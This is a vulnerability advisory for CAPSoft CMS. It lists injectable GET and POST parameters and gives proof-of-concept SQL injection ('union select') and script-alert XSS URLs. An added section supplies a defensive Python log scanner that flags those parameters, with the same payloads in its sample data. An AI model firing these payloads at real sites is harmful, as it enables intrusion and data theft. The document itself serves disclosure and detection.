CAPSoft CMS Multiple Vulnerabilities

2011-03-25T00:00:00
ID 1337DAY-ID-15692
Type zdt
Reporter p0pc0rn
Modified 2011-03-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
Title : CAPSoft CMS Multiple Vulnerabilities
Vendor : http://www.capsoft.com.ar
Found by : p0pc0rn

SQL
---
Vulnerable parameters:

Method = GET
------------
http://site.com/noticia.asp?id=[SQL]
http://site.com/imprimir.asp?tabla=[content_name]&id=[SQL]
http://site.com/product.asp?intProdID=[SQL]
http://site.com/productosporcategoria.asp?intCatalogID=[SQL]

POC
---
http://site.com/noticia.asp?id=1 union select 0 from test.a

Method = POST
-------------
buscador.asp
ingresar.asp

XSS
---
http://site.com/diseno_web.asp?pcia=[XSS]
http://site.com/productosporcategoria.asp?intCatalogID=[id_number]&strCatalog_NAME=[XSS]

POC
---
http://site.com/diseno_web.asp?pcia=<script>alert(/xssed/)</script>
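
Added example (not part of the original advisory): a Python check a defender could run over request URLs taken from web server logs, flagging the parameters listed above when they carry non-numeric ids or markup characters. The function names and sample URLs are constructed for illustration, and treating the id parameters as digits-only is an assumption about the application.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory lists, keyed by lower-cased script name.
# Assumption: the id parameters are meant to hold decimal digits only.
NUMERIC = {
    "noticia.asp": ["id"],
    "imprimir.asp": ["id"],
    "product.asp": ["intProdID"],
    "productosporcategoria.asp": ["intCatalogID"],
}
NO_MARKUP = {
    "diseno_web.asp": ["pcia"],
    "productosporcategoria.asp": ["strCatalog_NAME"],
}
DIGITS = re.compile(r"[0-9]+")
MARKUP = re.compile(r"[<>\"']")

def check_request(url):
    """Return a list of (parameter, reason) findings for one request URL."""
    parts = urlsplit(url)
    page = parts.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes values; names are compared case-insensitively.
    raw = parse_qs(parts.query, keep_blank_values=True)
    query = {k.lower(): v for k, v in raw.items()}
    findings = []
    for name in NUMERIC.get(page, []):
        for value in query.get(name.lower(), []):
            if not DIGITS.fullmatch(value):
                findings.append((name, "non-numeric id"))
    for name in NO_MARKUP.get(page, []):
        for value in query.get(name.lower(), []):
            if MARKUP.search(value):
                findings.append((name, "markup characters"))
    return findings

def scan(urls):
    """Map each flagged URL to its findings; clean URLs are omitted."""
    return {u: f for u in urls if (f := check_request(u))}

# Constructed sample requests (not real log data).
SAMPLE = [
    "/noticia.asp?id=42",
    "/noticia.asp?id=1%20union%20select%200%20from%20test.a",
    "/productosporcategoria.asp?intCatalogID=3&strCatalog_NAME=Sillas",
    "/diseno_web.asp?pcia=%3Cscript%3Ealert(/xssed/)%3C/script%3E",
]

if __name__ == "__main__":
    for url, findings in scan(SAMPLE).items():
        print(url, findings)
```

The same rule is what the application should enforce server-side: reject ids that are not digits before they reach a query, and HTML-encode pcia and strCatalog_NAME on output.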


